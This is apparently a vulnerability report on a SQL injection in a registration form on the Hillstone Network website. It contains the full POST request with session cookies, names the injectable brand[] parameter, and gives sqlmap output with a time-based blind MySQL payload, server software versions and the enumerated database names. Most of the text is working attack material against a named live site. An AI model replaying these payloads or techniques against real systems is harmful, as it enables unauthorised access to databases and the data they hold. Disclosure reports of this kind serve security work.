The SQL injection vulnerability in the main site of hillstone network affects database security.

The SQL injection vulnerability in the main site of hillstone network affects database security.

After seeing your recruitment information, I tested it with curiosity ···

POST Data Packet:


 

POST /pub/iNGFWtest/register.php HTTP/1.1Content-Length: 552Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.hillstonenet.com.cn:80/Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a2du63440nmb3fhj9f3hr6; lc8_oldtopics=D2206D1476D907D2274D71D; lc8_visitedfid=43D15D16D17D41; ndIz_2132_saltkey=ozV4Ig0K; ndIz_2132_lastvisit=1452227947; ndIz_2132_sid=Shmv2X; ndIz_2132_lastact=1452231547%09forum.php%09; phpcms_searchtime=1452231547Host: www.hillstonenet.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*brand%5b%5d=*&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales%5b%5d=CCNA&email=[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment%5b%5d=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media%5b%5d=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin

The first parameter brand [] can be injected.


 

If delayed injection is too slow, 26 hillstonenet tables will not be run.


 

 

sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:---Parameter: #1* ((custom) POST)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%83&credentiales[]=CCNA&email=[email protected]&environment=%e7%8e%b0%e7%bd%91%e6%b5%81%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=555-666-0606&username=admin---[13:54:09] [INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0.12[13:54:09] [INFO] fetching database names[13:54:09] [INFO] fetching number of databases[13:54:09] [INFO] retrieved:[13:54:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y2[13:54:22] [INFO] retrieved:[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response timesinformation_schema[13:57:06] [INFO] retrieved: hillstonenetavailable databases [2]:[*] hillstonenet[*] information_schema[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.hillstonenet.com.cn'[*] shutting down at 13:59:06